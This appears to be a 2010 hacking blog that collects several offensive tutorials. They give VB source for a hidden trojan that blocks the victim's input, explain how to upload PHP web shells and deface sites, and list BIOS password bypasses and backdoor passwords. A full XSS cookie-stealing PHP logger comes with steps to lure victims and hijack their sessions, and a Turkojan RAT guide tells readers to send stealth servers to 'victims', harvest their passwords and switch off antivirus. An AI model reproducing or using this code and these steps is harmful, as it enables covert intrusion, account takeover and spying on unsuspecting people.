Wednesday, February 24, 2010

Simple Trojan Codesin VB Script

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application
is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using


Code: VB
Private Sub Form_Load()      Me.Visible = False End Sub
This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Code: VB
Private Sub Form_Load()      Me.Visible = False      App.TaskVisible = False End Sub
So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Code: VB
Private Sub Form_Load()      Me.Visible = False      App.TaskVisible = False      win.LocalPort = 2999      win.RemotePort = 455      win.Listen End Sub
This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code: VB
Private Sub win_ConnectionRequest(ByVal requestID As Long)      win.Close      win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long)     win.GetData GotDat     DoActions (GotDat) End Sub
The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code: VB
Public Function DoActions(x As String)      Dim Action      Select Case x              Case "block"              Action = BlockInput(True)      End Select End Function
Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form
Code: VB
Private Sub Form_Load()      Me.Visible = False      App.TaskVisible = False      win.LocalPort = 2999      win.RemotePort = 455      win.Listen End Sub Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337      win.Close      win.Accept requestID End Sub Private Sub win_DataArrival(ByVal bytesTotal As Long)      win.GetData GotDat      DoActions (GotDat) End Sub
Remember to add your winsock control and name it to win if you use this code.

Code: VB
Module Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                      Public Function DoActions(x As String)      Dim Action      Select Case x                Case "block"                Action = BlockInput(True)      End Select End Function
That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Code: VB
Private Sub cmdConnect_Click()      IpAddy = txtIp.Text      Win.Close      Win.RemotePort = 2999      Win.RemoteHost = IpAddy      Win.LocalPort = 9999      Win.Connect      cmdConnect.Enabled = False End Sub Private Sub cmdDisconnect_Click()      Win.Close      cmdConnect.Enabled = True End Sub             Private Sub cmdBlockInput_Click()      Win.SendData "block" End Sub
That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

Hacking with SHELLS

I am pretty sure that the first thing that comes to your mind is "What the heck are these shells?" . So this article would give you complete idea about shells and its use.


Difference between FTP & Shells:

Many times I see that some of us know how to use the shell but once they have uploaded they get confused. So to start with, Let me give you some information about FTP:

File Transfer Protocol

Whenever you want to open your website, the first thing you will do is to get some web hosting for your self. That cud be either free or paid. When your get your hosting services, you create a website on your computer first and then upload it to your hosting server so it becomes a World Wide Web. This process of uploading the documents from your computer to your hosting server is done through FTP [File Transfer Protocol]. It basically looks like a program with 2 columns, one column shows your computer files and another shows your servers files. Just like when you copy the stuffs from some USB drive to your computer. So here, I will show you an example is how you would connect if you own go4expert. So when you want to connect your self to your web hosting server, following information is required in order to authenticate yourself:

Server : ftp.go4expert.com
Username: shabbir
password: whatever

So, once you put in this information, server understands that you are shabbir and gives you access to all the files on the server so you can work on it.

Shells:

Since you understand the FTP now, we know that none of us will get access to Go4expert's server because we don't have the username and password authenticate yourself. Somehow we can manage to get the access to G4E's FTP we can easily remove/edit/replace files. So we can destroy this entire forum and upload our own stuffs. That is when shells comes into the picture. Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly WITHOUT authenticating your self.

Moral of the Story:

I wrote the difference between FTP and shells so that you guyz can understand it, because lots of people tends to get confused between them. So again to make it clear, you can following thing:


Quote:
FTP is a protocol that lets you connect your computer to your hosting server so that you can upload/edit/delete/replace your files. Since we wouldn't have the username & password to connect to any website's ftp, thats why we will use the SHELL to get access. SO SHELL IS NOT FTP BUT IT GIVES YOU ACCESS TO THE HOSTING SERVER.
Funny Incidents:

Let me tell you guyz why i gave time to write this much about FTP in this article. In my forum, i reelased a couple of videos about "hacking with shells" etc .etc. So some guyz saw it and just copied what I was doing without understanding the logic.

I remember i saw couple of threads which said following thing:
" Hi guyz, i managed to hack my 1st website today! YAY, I am really happy! But theres only 1 problem, i uploaded the shell and ran it and it worked fine. The only problem is i dont have access to FTP."

Y0, i hacked a website today, uploaded a shell and it worked fine, now i am trying to get access to FTP

Logic

Shell is not a tool that you can run and complete your work. As I said, its just a normal ".php" file, you have to find a way in any website to upload that shell. The Idea is, you upload the shell to any website so it will be saved on their server and it will give you the access to it.

Phase 1 : Uploading a shell:

Suppose you want to hack "something.com". So the first thing that you will do is, open up "something.com", and try to find some place from where you can upload the files on the website. There are many such places for example, "file uploads, avatars, resume upload, cooking recipe uploads, upload your photo". So these are the places which will give you an opportunity to upload your shell. All you have to do is, try to upload the shell.php which is located in your computer and click on submit. So suppose you went to the webpage "something.com/submit_resume.php" and you uploaded your resume.

Phase 2 : Executing your uploaded shelll:

Once we have uploaded the shell as shown in "Phase:1", we know that its sitting on the server. The only thing we need to do now is to execute the shell from a browser so we get access to it.


Phase 3 : Defacing:

Defacign is a word which means "replacing the current index file with our own index with our motive and slogan on it". So once you have access to the server, you are the king

Different types of shells:

There are many shells available, most of them are public and some of them are private. Most of them does the samething to give you the access of the server. "c99, r57, b0yzone, j32" are some very common and easily available shells.

Where do I get them from?:

I'd have uploaded them here, but then it might have marked G4E as "Harmful web" on Google. So the best way is Google search with "inurl:c99.txt". You can replace c99 with r57, j32 or anything else.

Conclusion:

Now that you guyz know what are shells and how it works, i will start covering other method in coming articles. I will soon write about "RFI, LFI" which are somewhat connected with shells. Meanwhile, keep playing with it and learn more.

Important Piece of advice:

I would suggest you to download WAMP SERVER, which lets you make your own server on your comptuer. And then try to use shells on it. Which will help you avoid hacking in live environment. Because, if webmaster is smart then, he can simply check the logs for that shell fine and track down your IP which executed the shell. Then you might be in problem.

Bypass BIOS Password

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:

Code:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:

AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %øåñòü ïpîáåëîâ%, %äåâÿòü ïpîáåëîâ%

AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software

If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:

AMI/AWARD BIOS
Code:
O 70 17
O 71 17
Q
PHOENIX BIOS
Code:
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
Code:
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
If you can't access the computer when it's on, and the standard backdoor passwords didn't work, you'll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.
Using the jumpers

The canonical way to flash the BIOS via hardware is to plug, unplug, or switch a jumper on the motherboard (for "switching a jumper" I mean that you find a jumper that joins the central pin and a side pin of a group of three pins, you should then unplug the jumper and then plug it to the central pin and to the pin on the opposite side, so if the jumper is normally on position 1-2, you have to put it on position 2-3, or vice versa). This jumper is not always located near to the BIOS, but could be anywhere on the motherboard. To find the correct jumper you should read the motherboard's manual.

Once you've located the correct jumper, switch it (or plug or unplug it, depending from what the manual says) while the computer is turned OFF. Wait a couple of seconds then put the jumper back to its original position. In some motherboards it may happen that the computer will automatically turn itself on, after flashing the BIOS. In this case, turn it off, and put the jumper back to its original position, then turn it on again. Other motherboards require you turn the computer on for a few seconds to flash the BIOS.

If you don't have the motherboard's manual, you'll have to "brute force" it... trying out all the jumpers. In this case, try first the isolated ones (not in a group), the ones near to the BIOS, and the ones you can switch (as I explained before). If all them fail, try all the others. However, you must modify the status of only one jumper per attempt, otherwise you could damage the motherboard (since you don't know what the jumper you modified is actually meant for). If the password request screen still appear, try another one.

If after flashing the BIOS, the computer won't boot when you turn it on, turn it off, and wait some seconds before to retry.

Removing the battery

If you can't find the jumper to flash the BIOS or if such jumper doesn't exist, you can remove the battery that keeps the BIOS memory alive. It's a button-size battery somewhere on the motherboard (on elder computers the battery could be a small, typically blue, cylinder soldered to the motherboard, but usually has a jumper on its side to disconnect it, otherwise you'll have to unsolder it and then solder it back). Take it away for 15-30 minutes or more, then put it back and the data contained into the BIOS memory should be volatilized. I'd suggest you to remove it for about one hour to be sure, because if you put it back when the data aren't erased yet you'll have to wait more time, as you've never removed it. If at first it doesn't work, try to remove the battery overnight.

Important note: in laptop and notebooks you don't have to remove the computer's power batteries (which would be useless), but you should open your computer and remove the CMOS battery from the motherboard.

Short-circuiting the chip

Another way to clear the CMOS RAM is to reset it by short circuiting two pins of the BIOS chip for a few seconds. You can do that with a small piece of electric wire or with a bent paper clip. Always make sure that the computer is turned OFF before to try this operation.

Here is a list of EPROM chips that are commonly used in the BIOS industry. You may find similar chips with different names if they are compatible chips made by another brand. If you find the BIOS chip you are working on matches with one of the following you can try to short-circuit the appropriate pins. Be careful, because this operation may damage the chip.
CHIPS P82C206 (square)

Short together pins 12 and 32 (the first and the last pins on the bottom edge of the chip) or pins 74 and 75 (the two pins on the upper left corner).
Code:
gnd
       74
        |__________________
5v 75--|                   |
       |                   |
       |                   |
       |       CHIPS       |
   1 * |                   |
       |      P82C206      |
       |                   |
       |                   |
       |___________________|
        |                 |
        | gnd             | 5v
        12                32
OPTi F82C206 (rectangular)
Short together pins 3 and 26 (third pin from left side and fifth pin from right side on the bottom edge).
Code:
80              51
     |______________|
81 -|                |- 50
    |                |
    |                |
    |      OPTi      |  
    |                |
    |     F82C206    |
    |                |
100-|________________|-31
     ||           | |
   1 ||           | | 30
      3           26
Dallas DS1287, DS1287A
Benchmarq bp3287MT, bq3287AMT
The Dallas DS1287 and DS1287A, and the compatible Benchmarq bp3287MT and bq3287AMT chips have a built-in battery. This battery should last up to ten years. Any motherboard using these chips should not have an additional battery (this means you can't flash the BIOS by removing a battery). When the battery fails, the RTC chip would be replaced.

CMOS RAM can be cleared on the 1287A and 3287AMT chips by shorting pins 12 and 21.
The 1287 (and 3287MT) differ from the 1287A in that the CMOS RAM can't be cleared. If there is a problem such as a forgotten password, the chip must be replaced. (In this case it is recommended to replace the 1287 with a 1287A). Also the Dallas 12887 and 12887A are similar but contain twice as much CMOS RAM storage.
Code:
__________
     1 -| *  U     |-  24 5v
     2 -|          |-  23
     3 -|          |-  22
     4 -|          |-  21 RCL (RAM Clear)
     5 -|          |-  20
     6 -|          |-  19
     7 -|          |-  18
     8 -|          |-  17
     9 -|          |-  16
    10 -|          |-  15                            
    11 -|          |-  14
gnd 12 -|__________|-  13
NOTE: Although these are 24-pin chips,
the Dallas chips may be missing 5 pins,
these are unused pins.
Most chips have unused pins,
though usually they are still present.

Dallas DS12885S
Benchmarq bq3258S
Hitachi HD146818AP
Samsung KS82C6818A
This is a rectangular 24-pin DIP chip, usually in a socket. The number on the chip should end in 6818. Although this chip is pin-compatible with the Dallas 1287/1287A, there is no built-in battery.
Short together pins 12 and 24.
Code:
5v
 24          20                   13
 |___________|____________________|
|                                  |
|             DALLAS               |
|>                                 |
|            DS12885S              |
|                                  |
|__________________________________|
 |                                |
 1                                12
                                  gnd
Motorola MC146818AP
Short pins 12 and 24. These are the pins on diagonally opposite corners - lower left and upper right. You might also try pins 12 and 20.
Code:
__________
     1  -| *  U     |-  24 5v
     2  -|          |-  23
     3  -|          |-  22
     4  -|          |-  21
     5  -|          |-  20
     6  -|          |-  19
     7  -|          |-  18
     8  -|          |-  17
     9  -|          |-  16
    10  -|          |-  15
    11  -|          |-  14
gnd 12  -|__________|-  13
Replacing the chip

If nothing works, you could replace the existing BIOS chip with a new one you can buy from your specialized electronic shop or your computer supplier. It's a quick operation if the chip is inserted on a base and not soldered to the motherboard, otherwise you'll have to unsolder it and then put the new one. In this case would be more convenient to solder a base on which you'll then plug the new chip, in the eventuality that you'll have to change it again. If you can't find the BIOS chip specifically made for your motherboard, you should buy one of the same type (probably one of the ones shown above) and look in your motherboard manufacturer's website to see if there's the BIOS image to download. Then you should copy that image on the chip you bought with an EPROM programmer.

Important

Whether is the method you use, when you flash the BIOS not only the password, but also all the other configuration data will be reset to the factory defaults, so when you are booting for the first time after a BIOS flash, you should enter the CMOS configuration menu (as explained before) and fix up some things.

Also, when you boot Windows, it may happen that it finds some new device, because of the new configuration of the BIOS, in this case you'll probably need the Windows installation CD because Windows may ask you for some external files. If Windows doesn't see the CD-ROM try to eject and re-insert the CD-ROM again. If Windows can't find the CD-ROM drive and you set it properly from the BIOS config, just reboot with the reset key, and in the next run Windows should find it. However most files needed by the system while installing new hardware could also be found in C:\WINDOWS, C:\WINDOWS\SYSTEM, or C:\WINDOWS\INF .

Key Disk for Toshiba laptops

Some Toshiba notebooks allow to bypass BIOS by inserting a "key-disk" in the floppy disk drive
while booting. To create a Toshiba Keydisk, take a 720Kb or 1.44Mb floppy disk, format it (if it's not formatted yet), then use a hex editor such as Hex Workshop to change the first five bytes of the second sector (the one after the boot sector) and set them to 4B 45 59 00 00 (note that the first three bytes are the ASCII for "KEY" :) followed by two zeroes). Once you have created the key disk put it into the notebook's drive and turn it on, then push the reset button and when asked for password, press Enter. You will be asked to Set Password again. Press Y and Enter. You'll enter the BIOS configuration where you can set a new password.

Key protected cases

A final note about those old computers (up to 486 and early Pentiums) protected with a key that prevented the use of the mouse and the keyboard or the power button. All you have to do with them is to follow the wires connected to the key hole, locate the jumper to which they are connected and unplug it.

Stealing Cookie With XSS Tutorial

These tutorial is for the people who are familiar with XSS

Now we need to understand a bit more about how XSS actually works before moving on. From the above article, you already know a bit of the theory behind XSS, so we'll get right to the code. Let's say a web page has a search function that uses this code:


Code:
Name
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code:
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code:
Name">
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code:
">
This should close the quotes end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example,
Code:
http://www.site.com/search.php?q=">
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here:
Code:
http://centricle.com/tools/ascii-hex/
Hexing the query of this url gives us
Code:
http://www.site.com/search.php?q=%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%74%65%73%74%22%29%3c%2 f%73%63%72%69%70%74%3e
The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript
knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code:
function GetIP() 
{ 
 if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
  $ip = getenv("HTTP_CLIENT_IP"); 
 else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
  $ip = getenv("HTTP_X_FORWARDED_FOR"); 
 else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
  $ip = getenv("REMOTE_ADDR"); 
 else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) 
  $ip = $_SERVER['REMOTE_ADDR']; 
 else 
  $ip = "unknown"; 
 return($ip); 
} 

function logData() 
{ 
 $ipLog="log.txt"; 
 $cookie = $_SERVER['QUERY_STRING']; 
 $register_globals = (bool) ini_get('register_gobals'); 
 if ($register_globals) $ip = getenv('REMOTE_ADDR'); 
 else $ip = GetIP(); 

 $rem_port = $_SERVER['REMOTE_PORT']; 
 $user_agent = $_SERVER['HTTP_USER_AGENT']; 
 $rqst_method = $_SERVER['METHOD']; 
 $rem_host = $_SERVER['REMOTE_HOST']; 
 $referer = $_SERVER['HTTP_REFERER']; 
 $date=date ("l dS of F Y h:i:s A"); 
 $log=fopen("$ipLog", "a+"); 

 if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) 
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie 
"); 
 else 
  fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n"); 
 fclose($log); 
} 

logData(); 

?>
This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code:
">
yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code:
">
This will eliminate the looping problem since the user has to cilck on it for it to work, and it's only a one-way link. Of course, then the user's trail ends at your cookie stealing script, so you'd need to modify that code a little to keep them from suspecting what's going on. You Could just add some text to the page saying something like "under construction" by changing the end of our php script from this:

Code:
logData(); 
?>
to this:
Code:
logData();

echo 'Page Under Construction'
?>
Now when you open log.txt, you should see something like this:

Code:
IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php |  

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373
You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Summary

So in summary:
1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.

How to use Turkojan 4.0

It is basically a RAT(remote admin tool) with more features / type of a trojan. Below are the features for v4.0


Features:
  • Reverse Connection
  • Remote Desktop(very fast)
  • Webcam Streaming(very fast)
  • Audio Streaming
  • Thumbnail viewer
  • Remote passwords
  • MSN Sniffer
  • Remote Shell
  • Web-Site Blocking
  • Chat with server
  • Send fake messages
  • Advanced file manager
  • Zipping files&folders
  • Find files
  • Change remote screen resolution
  • Mouse manager
  • Information about remote computer
  • Clipboard manager
  • IE options
  • Running Process
  • Service Manager
  • Keyboard Manager
  • Online keylogger
  • Offline keylogger
  • Fun Menu
  • Registry manager
  • Invisible in Searching Files/Regedit/Msconfig
  • Small Server (100kb)
Reverse Connection :
Turkojan uses reverse connection method to reach remote computers.
Now doesn't that sound great? i think it does

Lets move on to downloading this program

First of all you need to see if you have a static ip or a dynamic ip now what is a static ip and a dynamic ip?

Dynamic IP

Quote:
Dynamic IP: A dynamic IP address changes each time you connect to your Internet Service Provider (ISP). This allows ISPs to keep a pool of addresses available to subscribers. If you disconnect from the ISP, your address is returned to the pool, becoming available to the next computer that connects.
Static ip

Quote:
Static IP: A static IP address is fixed, much like a telephone number. If your ISP gives you a static address, you will always use the same address. Servers usually have static addresses, so they can always be found at the same location.
Now if you have a dynamic ip go to

DYNDNS

watch this video on how to set up your dyndns

Video

watch this video on how to set up your NO-IP

Video

Now after you have done that open up turkojan v4.0 and at the top left hand corner select what language u want to view the program in then after that go to editor type in the ip that u used to sign up with no-ip / dyndns leave connection port the way it is conncetion delay leave it or change it up to u type in the username for the server your creating then click stealth mode and enable any of the following

Code:

copy server to pc
autostart server
melt server when run
copy with old file date
delete system restore points
restart when server is
Show message this message will display when the victam downloads your server then click the icon or you can use default or you can use icon hunter to convert a picture to a .ico =icon click save save it as what ever you want

Zip it up with winzip or winrar but make it a .zip file then send it to ur victims once they open it up it will say so in so is now online click here to connect with them be sure to click start before sending it to them tho. Or else u wouldn't know they are online and then you can do whatever for getting passwords from the pc go to passwords then click msn then it will download necessary file for you to view the passwords then after thats done it will show you the passwords on the pc.

Questions and answers?

Q: What is Turkojan?
A. Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.You can use Turkojan for manage computers,employee monitoring and child monitoring…
Q: How can I download Turkojan?
A. You can download Turkojan from here .
Q: What operating systems are supported?
A. Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista.
Q: When I try to download Turkojan a problem occurs,what can i do?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software could prevent downloading it.Close your antivirus software and try again..
Q: I have downloaded Turkojan,what should i do now?
A. You need to do some configrations to use Turkojan :
- Firstly, you need to forward port 15963(TCP) on your router.
- If you don’t have static ip address,your IP address will change every time you connect to the internet.So your server won’t be able to reach you.
To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.
Q: My antivirus software says that Turkojan includes a virus,is it true?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software can be the problem that prevents installing and downloading Turkojan,you can close your antivirus software and try to install Turkojan again.We suggest you to buy Turkojan Private Edition.
Q: How can I forward port 15963?
A. You can get detailed information about forwarding ports from here .
Q: Will Turkojan slow down my computer?
A. No. Turkojan is a really small and efficient application. It works quietly in the background and has been optimized to minimize resource use. You will not notice any decrease of performance of your computer..
Q: I have forgetten the password of my router,what should I do?
A. You can reset your router and load default settings.
Q: How can I understand that my ports are successfully forwarded?
A. You can use Port Tester in Turkojan Client.Check local tools in left menu..
Q: Why should I register a No-Ip veya DynDNS account?
A. If you don’t have static ip address,your ip address will change every time you connect to the internet.So your server won’t be able to reach you.
To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.
You can check videos, showing how to create accounts from these services..
Q: I have forwarded tcp port 15963 and create an account from No-Ip or DynDNS service,what should I do now ?
A. Now you need to create a server and send it to the computer that you want to connect.You can learn creating server from here.
Q: I have created a server from Server Editor,but I can’t see any server in directory where I save. Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.
Your antivirus software can label Turkojan Public Edition as unwanted application,so we suggest you to uninstall your antivirus software.
Q: I have created server,but I can’t send it via MSN or mail, what should i do ?
A. Server file is an application so you can’t send this type files via MSN and mail.So you need to add these files into achieve.We suggest you to use Winrar or Winzip..
Q: I did everything but when I send a server to my friend , I can’t connect him/her.Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs. So antivirus software which is installed on remote computer can cause this,we suggest you to buy Turkojan Private Edition.
Q: My and my friend’s antivirus softwares are closed,but I still can’t connect,what should I do ?
A. Your friend should uninstall antivirus software completely.
Q: I can see remote computer on Turkojan,but I can’t manage this computer.What should I do?
A. Congratulations.. To manage or start monitoring remote computer,you need to select it from the list and double click on it…
Q: I want to order Turkojan Private Edition.How much should I pay and how can I pay ?
A. You can contact us via e-mail,we will reply it as soon as possible..
Q: What are the differences between Turkojan Public Edition and Turkojan Private Edition ?
A. Turkojan Private Edition can’t be labeled as unwanted program by antivirus softwares.That means Turkojan will work without any problems with Antivirus softwares.
Q: After I purchase Turkojan Private Edition,if I have any problems,what can I do ? ?
A. If you have any problems you can contact us 7/24 via MSN and mail. Also you will be able to login private zone,so you can get help from other customers that bought Turkojan…
Q: How can I login private zone ?
A. We will send you a username and password after you purchase Turkojan Private Edition,so you will be able to login with these information..
Q: Is Turkojan illegal ?
A. No, there is nothing illegal about Turkojan itself. The vast majority of its developer is law-abiding person who create his programs exclusively for legitimate purposes.
There are many situations when monitoring the computer activity is perfectly legal: the parents can use key loggers to protect their children from online abuse,the companies may use Internet monitoring software to ensure that their employees don’t misuse corporate Internet connection and so on. Of course some people can
use the very same software for stealing passwords, credit card numbers or corporate secrets. However, even in this situation it’s not the software that breaks the law, but the person using it. There are also uses that are not strictly illegal, but have some moral ambiguity to them (for example, a computer activity monitor may be used to catch in the act a cheating spouse). When Turkojan is purchased the purchaser agrees that the computer it will be installed on is his or her own computer..
Q: Do I break any law by using Turkojan ?
A. It depends on the way you use them. In most cases you have the right to install any programs on the computer that belongs to you. You also have the right to install programs on other peoples’ computers if you have their permission. Installing a monitoring program on another person’s computer without his/her permission may be illegal. We will not try to give you any advice on the legal side of computer activity monitoring because everything depends on your particular situation. If you are in doubt, consult your lawyer..
Q: Can Turkojan be used for any legitimate purposes ?
A. Yes, sure. Here are just a few examples of perfectly legal uses of computer activity monitoring tools. You can:

- Monitor your children online activity to make sure they don’t visit pornographic Web sites or don’t make any dubious acquaintances.
- Ensure no one is accessing your personal files while you are away from the computer.
- Keep track of the inexperienced users’ activity to quickly locate the problem if they damage any system files.
- Monitor your employees’ computer activity to make sure they are really working and don’t do anything that may be a source of legal problems for you.
- Find out if someone uses your computer while you are away. . .
There you go if you have any questions just ask

Monday, February 22, 2010

List of Ports commonly used by Trojans

Please note that this isn't a complete list by any means, but it will give you an idea of what to look out for in Netstat. Be aware that some of the lower Ports may well be running valid services.

UDP:
1349 Back Ofrice DLL
31337 BackOfrice 1.20
31338 DeepBO
54321 BackOfrice 2000


TCP:
21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
23 Tiny Telnet Server
25 Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30
31 Hackers Paradise
80 Executor
